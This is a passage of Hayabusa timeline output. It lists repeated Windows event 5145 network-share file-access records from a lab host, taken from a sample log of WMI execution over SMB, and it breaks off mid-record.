20:32:30.906 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Servb00a6512# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.906 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Windows\assembly\NativeImages_v4.0.30319_32\System.Servb00a6512#\03d76bf2a39a57e8bed74e782c62fd1c | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.906 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Servd1dec626# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.906 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Servd1dec626#\ee53227bcc4430088d0b560752c1cd02 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.906 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Servf73e6522# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.906 
+09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Servf73e6522#\39bc23d9592ef276c70a36ef0311070a | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.ServiceModel | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.ServiceModel\4c3126aec3364546e4ade89c24c4e742 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Speech | IP Addr: 10.23.23.9 | LID: 
0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Speech\6d5f82d8178e3d8e9931e70dce584863 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Transactions | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Transactions\95c749867e5f72a09ed1e59a57931301 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | 
Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web\90285827b1300835ca1aaff1dff83a01 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.938 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.8da3333a# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.938 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.8da3333a#\3dde15282321aa41c609dc7f7a5f1af5 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.938 
+09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.8dc504e4# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.938 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.8dc504e4#\61d489d8a768782ce394f299dcc0e4bb | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.969 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.9c7998a9# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.969 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.9c7998a9#\f2c2cff3fa34c990079298396b1ec1fc | IP Addr: 10.23.23.9 | LID: 
0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.000 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.28b9ef5a# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.000 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.28b9ef5a#\4b7763786015950c44dbba0ff26b883e | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.016 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.82d5542b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.016 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Windows\assembly\NativeImages_v4.0.30319_32\System.Web.82d5542b#\af89139de3b87146c705fa989eeaa4b1 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.031 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.188dd00b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.031 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.188dd00b#\db42d61826797328b8b368348c6b3f13 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.063 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.1586a486# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.063 
+09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.1586a486#\9de316f43fe18621a13deefe7dbbbc27 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.078 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.2486c0f5# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.094 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.2486c0f5#\5a669ebdf74fb2c8f0d8148b4f79b9a2 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.094 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.4961ff77# | IP Addr: 10.23.23.9 | LID: 
0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.094 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.4961ff77#\81722d79b43d0329413516f10c3faf60 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.094 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.dc83ace6# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.094 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.dc83ace6#\cd0ef620fc82b9dab224ae428bb2a910 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: 
\\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Entity | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Entity\0023a84796c78827e3d0176900ba5b59 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Mobile | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Mobile\84ecb78e3635883e1cf8acae1dec527e | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 
+2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Routing | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Routing\aa9b0e256833bf2671e6cb5370559f4f | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Services | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Services\fe0f1499df5082fd5392827ddfb03c9e | IP Addr: 10.23.23.9 | LID: 
0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind0de890be# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind0de890be#\1235ba87f20536f0d0826b2ed514ab19 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.125 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind5abb17e9# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.125 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Windows\assembly\NativeImages_v4.0.30319_32\System.Wind5abb17e9#\928d9b9947cc9afb702c0c2fe2945da7 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.150 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind5cb9c182# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.150 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind5cb9c182#\55235c007590785b8554cd0c0dc95d36 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.182 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind74b7bf4b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.182 
+09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind74b7bf4b#\ee04d39ed856041bef2381a968f3c2b9 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.197 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind412bbddf# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.197 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind412bbddf#\cf3e7fb699d07208e389d8d3e5c3e3b4 | IP 